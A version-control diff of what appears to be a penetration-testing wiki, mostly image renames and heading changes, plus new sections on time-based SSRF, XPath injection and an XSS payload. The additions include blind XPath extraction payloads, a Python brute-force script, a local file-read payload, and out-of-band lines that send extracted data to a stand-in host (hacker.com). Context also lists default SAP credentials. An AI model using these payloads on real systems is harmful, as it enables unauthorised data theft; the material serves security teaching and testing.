GitBook: [master] 7 pages and 14 assets modified
Before Width: | Height: | Size: 341 KiB After Width: | Height: | Size: 341 KiB |
Before Width: | Height: | Size: 341 KiB After Width: | Height: | Size: 341 KiB |
Before Width: | Height: | Size: 10 KiB After Width: | Height: | Size: 10 KiB |
Before Width: | Height: | Size: 10 KiB After Width: | Height: | Size: 10 KiB |
BIN
.gitbook/assets/image (479) (2) (1).png
Normal file
After Width: | Height: | Size: 18 KiB |
Before Width: | Height: | Size: 18 KiB After Width: | Height: | Size: 38 KiB |
BIN
.gitbook/assets/image (507) (1) (1).png
Normal file
After Width: | Height: | Size: 2.8 KiB |
Before Width: | Height: | Size: 2.8 KiB After Width: | Height: | Size: 35 KiB |
BIN
.gitbook/assets/image (532).png
Normal file
After Width: | Height: | Size: 66 KiB |
BIN
.gitbook/assets/image (533).png
Normal file
After Width: | Height: | Size: 35 KiB |
|
@ -134,7 +134,7 @@ Some interesting attributes:
|
|||
* [$Data](https://flatcap.org/linux-ntfs/ntfs/attributes/data.html) \(among others\):
|
||||
* Contains the file's data or the indication of the sectors where the data resides. In the following example the attribute data is not resident so the attribute gives information about the sectors where the data resides.
|
||||
|
||||
![](../../../.gitbook/assets/image%20%28507%29%20%281%29.png)
|
||||
![](../../../.gitbook/assets/image%20%28507%29%20%281%29%20%281%29.png)
|
||||
|
||||
![](../../../.gitbook/assets/image%20%28512%29.png)
|
||||
|
||||
|
|
|
@ -130,7 +130,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
|
|||
|
||||
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
|
||||
|
||||
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%281%29.png)
|
||||
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%281%29.png)
|
||||
|
||||
### USB Detective
|
||||
|
||||
|
|
|
@ -601,7 +601,7 @@ Many apps log informative \(and potentially sensitive\) messages to the console
|
|||
5. Reproduce the problem.
|
||||
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
|
||||
|
||||
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%281%29.png)
|
||||
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%282%29%20%281%29.png)
|
||||
|
||||
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
|
||||
|
||||
|
|
|
@ -506,6 +506,10 @@ curl http://rancher-metadata/<version>/<path>
|
|||
|
||||
The difference between a blind SSRF and a not blind one is that in the blind you cannot see the response of the SSRF request. Then, it is more difficult to exploit because you will be able to exploit only well-known vulnerabilities.
|
||||
|
||||
### Time based SSRF
|
||||
|
||||
**Checking the time** of the responses from the server it might be **possible to know if a resource exists or not** \(maybe it takes more time accessing an existing resource than accessing one that doesn't exist\)
|
||||
|
||||
## Detect SSRF
|
||||
|
||||
You can use [https://github.com/teknogeek/ssrf-sheriff](https://github.com/teknogeek/ssrf-sheriff) to create an HTTP server that will respond correctly to a lot of different requests \(GET, POST, PTU, DELETE, JSON, TXT, GIF, MP3...\).
|
||||
|
|
|
@ -101,7 +101,7 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
|
|||
|
||||
## Example
|
||||
|
||||
```text
|
||||
```markup
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<data>
|
||||
<user>
|
||||
|
@ -122,6 +122,8 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
|
|||
</data>
|
||||
```
|
||||
|
||||
### Access the information
|
||||
|
||||
```text
|
||||
All names - [pepe, mark, fino]
|
||||
name
|
||||
|
@ -149,6 +151,43 @@ string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe
|
|||
substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
|
||||
```
|
||||
|
||||
### Identify & stealing the schema
|
||||
|
||||
```python
|
||||
and count(/*) = 1 #root
|
||||
and count(/*[1]/*) = 2 #count(root) = 2 (a,c)
|
||||
and count(/*[1]/*[1]/*) = 1 #count(a) = 1 (b)
|
||||
and count(/*[1]/*[1]/*[1]/*) = 0 #count(b) = 0
|
||||
and count(/*[1]/*[2]/*) = 3 #count(c) = 3 (d,e,f)
|
||||
and count(/*[1]/*[2]/*[1]/*) = 0 #count(d) = 0
|
||||
and count(/*[1]/*[2]/*[2]/*) = 0 #count(e) = 0
|
||||
and count(/*[1]/*[2]/*[3]/*) = 1 #count(f) = 1 (g)
|
||||
and count(/*[1]/*[2]/*[3]/[1]*) = 0 #count(g) = 0
|
||||
|
||||
#The previous solutions are the representation of a schema like the following
|
||||
#(at this stage we don't know the name of the tags, but jus the schema)
|
||||
<root>
|
||||
<a>
|
||||
<b></b>
|
||||
</a>
|
||||
<c>
|
||||
<d></d>
|
||||
<e></e>
|
||||
<f>
|
||||
<h></h>
|
||||
</f>
|
||||
</c>
|
||||
</root>
|
||||
|
||||
and name(/*[1]) = "root" #Confirm the name of the first tag is "root"
|
||||
and substring(name(/*[1]/*[1]),1,1) = "a" #First char of name of tag `<a>` is "a"
|
||||
and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #Firts char of tag `<b>`is codepoint 105 ("i") (https://codepoints.net/)
|
||||
|
||||
#Stealing the schema via OOB
|
||||
doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
|
||||
doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
|
||||
```
|
||||
|
||||
## Authentication Bypass
|
||||
|
||||
### **Example of queries:**
|
||||
|
@ -228,17 +267,18 @@ The output contains strings and the user can manipulate the values to search:
|
|||
|
||||
### **Get length of a value and extract it by comparisons:**
|
||||
|
||||
```text
|
||||
```bash
|
||||
' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4
|
||||
' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True is first equals "a"
|
||||
|
||||
Other way
|
||||
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
|
||||
|
||||
... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it rises an error and never returns a value
|
||||
```
|
||||
|
||||
### **Example:**
|
||||
### **Python Example**
|
||||
|
||||
```text
|
||||
```python
|
||||
import requests, string
|
||||
|
||||
flag = ""
|
||||
|
@ -259,6 +299,31 @@ for i in range(1, l + 1): #print("[i] Looking for char number " + str(i))
|
|||
break
|
||||
```
|
||||
|
||||
### Read file
|
||||
|
||||
```python
|
||||
(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127
|
||||
```
|
||||
|
||||
## OOB Exploitation
|
||||
|
||||
```python
|
||||
doc(concat("http://hacker.com/oob/", RESULTS))
|
||||
doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))
|
||||
doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))
|
||||
|
||||
#Instead of doc() you can use the function doc-available
|
||||
doc-available(concat("http://hacker.com/oob/", RESULTS))
|
||||
#the doc available will respond true or false depending if the doc exists,
|
||||
#user not(doc-available(...)) to invert the result if you need to
|
||||
```
|
||||
|
||||
### Automatic tool
|
||||
|
||||
{% embed url="https://xcat.readthedocs.io/" %}
|
||||
|
||||
|
||||
|
||||
## References
|
||||
|
||||
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection)
|
||||
|
|
|
@ -314,6 +314,12 @@ Once the server has downloaded your file, you need to find its location by brows
|
|||
Writing files in a temporary directory can help to e**scalate another vulnerability that involves a path traversal** \(such as local file include, template injection, XSLT RCE, deserialization, etc\).
|
||||
{% endhint %}
|
||||
|
||||
### XSS
|
||||
|
||||
```markup
|
||||
<![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>
|
||||
```
|
||||
|
||||
### DoS
|
||||
|
||||
#### Billion Laugh Attack
|
||||
|
@ -343,6 +349,10 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
|
|||
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
|
||||
```
|
||||
|
||||
#### Quadratic Blowup Attack
|
||||
|
||||
![](../.gitbook/assets/image%20%28479%29.png)
|
||||
|
||||
## Hidden XXE Surfaces
|
||||
|
||||
### XInclude
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
# Pentesting SAP
|
||||
|
||||
### Introduction about SAP
|
||||
## Introduction about SAP
|
||||
|
||||
SAP stands for Systems Applications and Products in Data Processing. SAP, by definition, is also the name of the ERP \(Enterprise Resource Planning\) software as well as the name of the company.
|
||||
SAP system consists of a number of fully integrated modules, which covers virtually every aspect of business management.
|
||||
|
@ -15,7 +15,7 @@ You’d be surprised if you knew how often these **passwords aren’t changed in
|
|||
Try to get access to the shell of any server using username <SID>adm.
|
||||
Bruteforcing can help, whoever there can be Account Lockout mechanism.
|
||||
|
||||
### Discovery
|
||||
## Discovery
|
||||
|
||||
> Next section is mostly from [https://github.com/shipcod3/mySapAdventures](https://github.com/shipcod3/mySapAdventures) from user shipcod3!
|
||||
|
||||
|
@ -63,7 +63,7 @@ msf auxiliary(sap_service_discovery) > run
|
|||
[*] 192.168.96.101: - [SAP] Beginning service Discovery '192.168.96.101'
|
||||
```
|
||||
|
||||
#### Testing the Thick Client / SAP GUI
|
||||
### Testing the Thick Client / SAP GUI
|
||||
|
||||
Here is the command to connect to SAP GUI
|
||||
`sapgui <sap server hostname> <system number>`
|
||||
|
@ -126,7 +126,7 @@ BWDEVELOPER:Down1oad:001
|
|||
* Check if you can execute system commands / run scripts in the client.
|
||||
* Check if you can do XSS on BAPI Explorer
|
||||
|
||||
### Testing the web interface
|
||||
## Testing the web interface
|
||||
|
||||
* Crawl the URLs \(see discovery phase\).
|
||||
* Fuzz the URLs like in the discovery phase. Here is what [http://SAP:50000/index.html](http://sap:50000/index.html) looks like:
|
||||
|
@ -176,7 +176,7 @@ This XML file does not appear to have any style information associated with it.
|
|||
</SOAP-ENV:Envelope>
|
||||
```
|
||||
|
||||
### Attack!
|
||||
## Attack!
|
||||
|
||||
* Check if it runs on old servers or technologies like Windows 2000.
|
||||
* Plan the possible exploits / attacks, there are a lot of Metasploit modules for SAP discovery \(auxiliary modules\) and exploits:
|
||||
|
@ -278,14 +278,14 @@ bizploit/plugins> back
|
|||
bizploit> start
|
||||
```
|
||||
|
||||
### Other Useful Tools for Testing
|
||||
## Other Useful Tools for Testing
|
||||
|
||||
* [PowerSAP](https://github.com/airbus-seclab/powersap) - Powershell tool to assess sap security
|
||||
* [Burp Suite](https://portswigger.net/burp) - a must have for directory fuzzing and web security assessments
|
||||
* [pysap](https://github.com/SecureAuthCorp/pysap) - Python library to craft SAP network protocol packets
|
||||
* [https://github.com/gelim/nmap-erpscan](https://github.com/gelim/nmap-erpscan) - Help nmap to detect SAP/ERP
|
||||
|
||||
### References
|
||||
## References
|
||||
|
||||
* [SAP Penetration Testing Using Metasploit](http://information.rapid7.com/rs/rapid7/images/SAP%20Penetration%20Testing%20Using%20Metasploit%20Final.pdf)
|
||||
* [https://github.com/davehardy20/SAP-Stuff](https://github.com/davehardy20/SAP-Stuff) - a script to semi-automate Bizploit
|
||||
|
|